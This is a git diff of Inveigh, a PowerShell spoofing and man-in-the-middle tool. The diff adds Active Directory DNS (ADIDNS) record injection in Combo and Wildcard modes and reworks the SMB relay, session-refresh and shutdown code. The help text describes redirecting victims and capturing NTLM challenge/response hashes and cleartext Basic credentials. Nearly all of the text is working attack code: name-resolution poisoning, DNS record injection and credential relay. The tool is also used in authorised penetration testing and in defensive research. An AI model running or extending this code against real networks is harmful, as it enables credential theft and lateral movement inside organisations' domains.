- $SMB_client.Client.ReceiveTimeout = 5000
- $SMB_client.Connect($target_entry,"445")
-
- if(!$SMB_client.connected)
- {
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null
- }
- else
- {
- SMBRelayChallenge $SMB_client $null '$SMB1' $process_ID_bytes $true > $null
- }
-
- }
-
- if(!$inveigh.target_list)
- {
- StopInveigh "empty target list"
- }
-
- }
+ param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime)
function OutputQueueLoop
{
@@ -5472,9 +5930,9 @@ $control_relay_scriptblock =
}
- function StopInveigh
+ function Stop-InveighRunspace
{
- param ([String]$exit_message)
+ param ([String]$Message)
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
@@ -5499,24 +5957,24 @@ $control_relay_scriptblock =
}
- if($inveigh.DNS_list.Count -gt 0)
+ if($inveigh.DNS_table.Count -gt 0)
{
- foreach($DNS_host in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS_host.StartsWith("1,"))
+ if($inveigh.DNS_table.$DNS_host -eq 1)
{
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+ $DNS_update = Invoke-DNSUpdateLite -DNSType A -DNSName $DNS_host
if($DNS_update -eq "[+] DNS update successful")
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $DNS_host removed")
}
else
{
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $DNS_host remove failed")
}
}
@@ -5527,11 +5985,60 @@ $control_relay_scriptblock =
$inveigh.requested_host_list = New-Object System.Collections.ArrayList
$inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
}
+
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.DNS_table.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
+ {
+
+ if($inveigh.DNS_table.$DNS_host -eq 1)
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node $DNS_host -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ $inveigh.DNS_table.$DNS_host = ""
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] ADIDNS host (A) record for $DNS_host remove failed") > $null
+ }
+
+ }
+
+ }
+
+ }
if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $Message") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.relay_running = $false
@@ -5540,7 +6047,12 @@ $control_relay_scriptblock =
if($inveigh.running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $Message") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.running = $false
@@ -5549,12 +6061,6 @@ $control_relay_scriptblock =
$inveigh.HTTPS = $false
}
- if($SigningCheck -eq 'Y' -and $Target.Count -eq 1)
- {
- #SigningCheck
- $SigningCheck = 'N'
- }
-
if($RunTime)
{
$control_timeout = New-TimeSpan -Minutes $RunTime
@@ -5567,7 +6073,7 @@ $control_relay_scriptblock =
if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
{
Start-Sleep -S 5
- StopInveigh "disabled relay"
+ Stop-InveighRunspace "disabled relay"
}
if($RunTime)
@@ -5575,7 +6081,7 @@ $control_relay_scriptblock =
if($control_stopwatch.Elapsed -ge $control_timeout)
{
- StopInveigh "run time"
+ Stop-InveighRunspace "run time"
}
}
@@ -5627,6 +6133,13 @@ $control_relay_scriptblock =
OutputQueueLoop
Start-Sleep -m 5
+
+ if($inveigh.stop)
+ {
+ $inveigh.console_queue.Clear()
+ Stop-InveighRunspace
+ }
+
}
}
@@ -5648,7 +6161,7 @@ $session_refresh_scriptblock =
while($session -le $inveigh.session_socket_table.Count)
{
$session_timespan = New-TimeSpan $inveigh.session_list[$session]."Last Activity" $(Get-Date)
-
+
if($inveigh.session_socket_table[$session].Connected -and $inveigh.session_lock_table[$session] -eq 'open' -and $session_timespan.Minutes -ge $SessionRefresh)
{
$inveigh.session_lock_table[$session] = 'locked'
@@ -5662,9 +6175,7 @@ $session_refresh_scriptblock =
$SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
$message_ID++
$packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $false $message_ID $process_ID_bytes $tree_ID $session_ID
- #$packet_SMB2_header = New-PacketSMB2Header 0x0D,0x00 0x01,0x00 $message_ID $process_ID_bytes $tree_ID $session_ID
$packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
- #$packet_SMB2_data = New-PacketSMB2Echo # doesn't work for Win7
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
@@ -5679,7 +6190,8 @@ $session_refresh_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay session $session has closed") > $null
+ $inveigh.session_list[$session] | Where-Object {$_.Status = "disconnected"}
}
if($inveigh.session_socket_table[$session].Connected)
@@ -5703,7 +6215,8 @@ $session_refresh_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay session $session has closed") > $null
+ $inveigh.session_list[$session] | Where-Object {$_.Status = "disconnected"}
}
}
@@ -5724,6 +6237,9 @@ $session_refresh_scriptblock =
}
+#endregion
+#region begin startup functions
+
# HTTP Listener Startup Function
function HTTPListener
{
@@ -5738,13 +6254,14 @@ function HTTPListener
$HTTP_powershell.AddScript($packet_functions_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
- $Command).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedAuthLimit).AddArgument(
+ $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
$Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
$SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
- $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
- $WPADResponse) > $null
+ $Target).AddArgument($TargetMode).AddArgument($TargetRefresh).AddArgument($Username).AddArgument(
+ $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -5762,9 +6279,10 @@ function HTTPSListener
$HTTPS_powershell.AddScript($packet_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
- $Command).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedAuthLimit).AddArgument(
+ $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
$Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
$SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
$Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
@@ -5786,9 +6304,10 @@ function ProxyListener
$proxy_powershell.AddScript($packet_functions_scriptblock) > $null
$proxy_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
- $Command).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedAuthLimit).AddArgument(
+ $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
$Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
$SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
$Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
@@ -5808,7 +6327,7 @@ function ControlRelayLoop
$control_relay_powershell.AddScript($packet_functions_scriptblock) > $null
$control_relay_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
- $RelayAutoExit).AddArgument($RunTime).AddArgument($SigningCheck) > $null
+ $RelayAutoExit).AddArgument($RunTime) > $null
$control_relay_powershell.BeginInvoke() > $null
}
@@ -5827,6 +6346,9 @@ function SessionRefreshLoop
$session_refresh_powershell.BeginInvoke() > $null
}
+#endregion
+#region begin startup enabled services
+
# HTTP Server Start
if($HTTP -eq 'Y')
{
@@ -6095,7 +6617,9 @@ finally
}
}
-#End Invoke-InveighRelay
+
+#endregion
+#region begin support functions
function Stop-Inveigh
{
@@ -6104,76 +6628,41 @@ function Stop-Inveigh
Stop-Inveigh will stop all running Inveigh functions.
#>
-if($inveigh)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
+ if($inveigh)
{
+ $inveigh.stop = $true
- if($inveigh.DNS_list.Count -gt 0)
+ if($inveigh.running -or $inveigh.relay_running)
{
+ $inveigh.console_queue.Clear()
+ Watch-Inveigh -NoConsoleMessage
- foreach($DNS_host in $inveigh.DNS_list)
+ <#
+ if($inveigh.relay_running)
{
-
- if($DNS_host.StartsWith("1,"))
- {
-
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
-
- if($DNS_update -eq "[+] DNS update successful")
- {
- $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
- Write-Output $output
- }
- else
- {
- $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
- Write-Warning $output
- }
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
}
- }
-
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
- }
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
+ if($inveigh.log_output)
{
- $certificate_store.Remove($certificate)
+ $inveigh.log.Add($output) > $null
}
- $certificate_store.Close()
- }
- catch
+ Write-Output $output
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
{
- $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
if($inveigh.file_output)
{
- $output | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
@@ -6181,56 +6670,20 @@ if($inveigh)
$inveigh.log.Add($output) > $null
}
- Write-Warning $output
+ Write-Output $output
+ $inveigh.running = $false
}
+ $inveigh.HTTPS = $false
+ #>
+ Start-Sleep -S 5
}
-
- if($inveigh.relay_running)
- {
- $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.relay_running = $false
- }
-
- if($inveigh.running)
+ else
{
- $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.running = $false
+ Write-Output "[-] There are no running Inveigh functions"
}
- $inveigh.HTTPS = $false
- Start-Sleep -S 5
}
- else
- {
- Write-Output "[-] There are no running Inveigh functions"
- }
-
-}
}
@@ -6485,7 +6938,7 @@ Get relay session list.
if($Enumeration)
{
- Write-Output $inveigh.enumeration_list | Format-Table
+ Write-Output $inveigh.enumeration_data | Format-Table
}
}
@@ -6609,4 +7062,6 @@ if($inveigh)
}
+#endregion
+
} \ No newline at end of file
diff --git a/Inveigh.ps1 b/Inveigh.ps1
index f067d82..87f0a56 100644
--- a/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -2,21 +2,43 @@ function Invoke-Inveigh
{
<#
.SYNOPSIS
-Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with challenge/response
-capture over HTTP/HTTPS/Proxy/SMB.
+This function is a Windows PowerShell ADIDNS/LLMNR/NBNS/mDNS spoofer.
.DESCRIPTION
-Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with the following features:
-
- IPv4 LLMNR/mDNS/NBNS spoofer with granular control
- AD DNS injection through secure dynamic updates
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB
- Basic auth cleartext credential capture over HTTP/HTTPS/Proxy
- WPAD server capable of hosting a basic or custom wpad.dat file
- HTTP/HTTPS/Proxy server capable of hosting limited content
- Granular control of console and file output
- Run time and run count control
- LLMNR/NBNS spoofer learning mode
+This function is a Windows PowerShell ADIDNS/LLMNR/NBNS/mDNS spoofer/man-in-the-middle tool with
+challenge/response capture over HTTP/HTTPS/Proxy/SMB.
+
+.PARAMETER ADIDNS
+Default = Disabled: (Combo/Wildcard) Enable an ADIDNS spoofing attack. Combo looks at LLMNR/NBNS requests and adds
+a record to DNS if the same request is received from multiple systems. Wildcard injects a wildcard record.
+
+.PARAMETER ADIDNSCredential
+PSCredential object that will be used with ADIDNS spoofing.
+
+.PARAMETER ADIDNSDomain
+The targeted domain in DNS format. This parameter is required when using an IP address in the
+ADIDNSDomainController parameter.
+
+.PARAMETER ADIDNSDomainController
+Domain controller to target. This parameter is mandatory on a non-domain attached system.
+
+.PARAMETER ADIDNSHostsIgnore
+Comma seperated list of hosts that will be ignored with ADIDNS spoofing.
+
+.PARAMETER ADIDNSIP
+IP address for ADIDNS spoofing. This parameter is only necessary when redirecting victims to a system other than
+the Inveigh host.
+
+.PARAMETER ADIPartition
+Default = DomainDNSZones: (DomainDNSZones/ForestDNSZone) The AD partition name where the zone is stored.
+
+.PARAMETER ADIDNSThreshold
+Default = 4: The threshold used to determine when ADIDNS records are injected for the combo attack. Inveigh will
+track identical LLMNR and NBNS requests received from multiple systems. DNS records will be injected once the
+system count for identical LLMNR and NBNS requests exceeds the threshold.
+
+.PARAMETER ADIDNSZone
+The ADIDNS zone.
.PARAMETER Challenge
Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
@@ -37,16 +59,8 @@ displaying full capture lists when running through a shell that does not have ac
Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
and username combinations when real time console output is enabled.
-.PARAMETER DNS
-Default = Disabled: (Y/N) Enable/Disable injecting DNS host (A) records using dynamic updates.
-
-.PARAMETER DNSThreshold
-Default = 5: The threshold used to determine when DNS records are injected. Inveigh will track identical LLMNR and
-NBNS requests received from multiple systems. DNS records will be injected once the system count for identical LLMNR
-and NBNS requests reaches the threshold.
-
-.PARAMETER DNSTTL
-Default = 3600 Seconds: DNS TTL in seconds for A records.
+.PARAMETER ADIDNSTTL
+Default = 600 Seconds: DNS TTL in seconds for added A records.
.PARAMETER ElevatedPrivilege
Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with
@@ -217,7 +231,7 @@ Default = All: Comma separated list of requested hostnames to ignore when spoofi
Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR/mDNS/NBNS.
.PARAMETER SpooferIP
-IP address for LLMNR/mDNS/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+IP address for ADIDNS/LLMNR/mDNS/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
other than the Inveigh host.
.PARAMETER SpooferIPsIgnore
@@ -324,11 +338,13 @@ Execute specifying an HTTP redirect response.
https://github.com/Kevin-Robertson/Inveigh
#>
+#region begin parameters
+
# Parameter default values can be modified in this section:
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][Array]$DNSHostsIgnore = ("isatap","wpad"),
+ [parameter(Mandatory=$false)][Array]$ADIDNSHostsIgnore = ("isatap","wpad"),
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
@@ -339,8 +355,8 @@ param
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
- [parameter(Mandatory=$false)][Int]$DNSThreshold = "5",
- [parameter(Mandatory=$false)][Int]$DNSTTL = "3600",
+ [parameter(Mandatory=$false)][Int]$ADIDNSThreshold = "4",
+ [parameter(Mandatory=$false)][Int]$ADIDNSTTL = "600",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
@@ -354,6 +370,9 @@ param
[parameter(Mandatory=$false)][Int]$WPADPort = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
+ [parameter(Mandatory=$false)][String]$ADIDNSDomain = "",
+ [parameter(Mandatory=$false)][String]$ADIDNSDomainController = "",
+ [parameter(Mandatory=$false)][String]$ADIDNSZone = "",
[parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
[parameter(Mandatory=$false)][String]$HTTPContentType = "text/html",
[parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
@@ -365,7 +384,8 @@ param
[parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$DNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Combo","Wildcard")][String]$ADIDNS,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$ADIDNSPartition = "DomainDNSZones",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Evade = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
@@ -398,16 +418,20 @@ param
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
[parameter(Mandatory=$false)][Switch]$Inspect,
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ADIDNSIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$ADIDNSCredential,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
-if ($invalid_parameter)
+#endregion
+#region begin initialization
+if($invalid_parameter)
{
Write-Output "[-] $($invalid_parameter) is not a valid parameter"
throw
@@ -417,7 +441,17 @@ $inveigh_version = "1.4 Dev"
if(!$IP)
{
- $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+
+ try
+ {
+ $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ }
+ catch
+ {
+ Write-Output "[-] Error finding local IP, specify manually with -IP"
+ throw
+ }
+
}
if(!$SpooferIP)
@@ -425,6 +459,46 @@ if(!$SpooferIP)
$SpooferIP = $IP
}
+if($ADIDNS)
+{
+
+ if($ADIDNS -and !$ADIDNSIP)
+ {
+ $ADIDNSIP = $SpooferIP
+ }
+
+ if(!$ADIDNSDomainController -or !$ADIDNSDomain -or !$ADIDNSZone)
+ {
+
+ try
+ {
+ $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+ }
+ catch
+ {
+ Write-Output "[-] $($_.Exception.Message)"
+ throw
+ }
+
+ if(!$ADIDNSDomainController)
+ {
+ $ADIDNSDomainController = $current_domain.PdcRoleOwner.Name
+ }
+
+ if(!$ADIDNSDomain)
+ {
+ $ADIDNSDomain = $current_domain.Name
+ }
+
+ if(!$ADIDNSZone)
+ {
+ $ADIDNSZone = $current_domain.Name
+ }
+
+ }
+
+}
+
if($HTTPDefaultFile -or $HTTPDefaultEXE)
{
@@ -481,19 +555,20 @@ if(!$inveigh)
$inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.relay_user_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.DNS_table = [HashTable]::Synchronized(@{})
$inveigh.relay_privilege_table = [HashTable]::Synchronized(@{})
$inveigh.relay_failed_auth_table = [HashTable]::Synchronized(@{})
$inveigh.relay_history_table = [HashTable]::Synchronized(@{})
+ $inveigh.request_table = [HashTable]::Synchronized(@{})
$inveigh.session_socket_table = [HashTable]::Synchronized(@{})
$inveigh.session_table = [HashTable]::Synchronized(@{})
$inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
$inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.SMB_session_table = [HashTable]::Synchronized(@{})
+ $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{})
$inveigh.session_count = 0
$inveigh.session_list = @()
- $inveigh.enumeration_list = @()
+ $inveigh.enumeration_data = @()
}
if($inveigh.running)
@@ -502,11 +577,7 @@ if($inveigh.running)
throw
}
-if($HTTP_listener.IsListening -and !$inveigh.relay_running)
-{
- $HTTP_listener.Stop()
- $HTTP_listener.Close()
-}
+$inveigh.stop = $false
if(!$inveigh.relay_running)
{
@@ -600,13 +671,6 @@ if(!$elevated_privilege)
$SMB = "N"
}
-if($DNS -eq 'Y' -and !(Get-Command Invoke-DNSupdate -errorAction SilentlyContinue))
-{
- Write-Output "[-] DNS requires Invoke-DNSUpdate"
- throw
- $DNS = "N"
-}
-
$inveigh.hostname_spoof = $false
$inveigh.running = $true
@@ -693,13 +757,33 @@ else
$inveigh.newline = ""
}
+$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value
+$inveigh.computer_name = (Get-ChildItem -path env:computername).Value
+
+try
+{
+ $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain).Value).ToLower()
+ $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower()
+
+ if(!$inveigh.domain_mapping_table.($inveigh.netBIOS_domain))
+ {
+ $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain)
+ }
+
+}
+catch
+{
+ $inveigh.DNS_domain = $inveigh.netBIOS_domain
+ $inveigh.DNS_computer_name = $inveigh.computer_name
+}
+
if($inveigh.relay_running)
{
$inveigh.output_pause = $true
}
-# Write startup messages
-
+#endregion
+#region begin startup messages
$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null
if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege)
@@ -741,7 +825,7 @@ if($LLMNR -eq 'Y')
else
{
$inveigh.output_queue.Add("[+] LLMNR Spoofer = Disabled") > $null
- $LLMNR_response_message = "[LLMNR spoofer is disabled]"
+ $LLMNR_response_message = "[Spoofer Disabled]"
}
if($mDNS -eq 'Y')
@@ -772,7 +856,7 @@ if($mDNS -eq 'Y')
else
{
$inveigh.output_queue.Add("[+] mDNS Spoofer = Disabled") > $null
- $mDNS_response_message = "[mDNS spoofer is disabled]"
+ $mDNS_response_message = "[Spoofer Disabled]"
}
if($NBNS -eq 'Y')
@@ -792,7 +876,7 @@ if($NBNS -eq 'Y')
else
{
$inveigh.output_queue.Add("[+] NBNS Spoofer = Disabled") > $null
- $NBNS_response_message = "[NBNS spoofer is disabled]"
+ $NBNS_response_message = "[Spoofer Disabled]"
}
if($NBNSBruteForce -eq 'Y')
@@ -871,15 +955,25 @@ else
$inveigh.spoofer_repeat = $true
}
-if($DNS -eq 'Y')
+if($ADIDNS)
{
- $inveigh.DNS = $true
- $inveigh.output_queue.Add("[+] DNS Injection = Enabled") > $null
- $inveigh.output_queue.Add("[+] DNS Hosts Ignore = " + ($DNSHostsIgnore -join ",")) > $null
+ $inveigh.ADIDNS = $ADIDNS
+ $inveigh.output_queue.Add("[+] ADIDNS Spoofer = $ADIDNS") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Spoofer IP = $ADIDNSIP") > $null
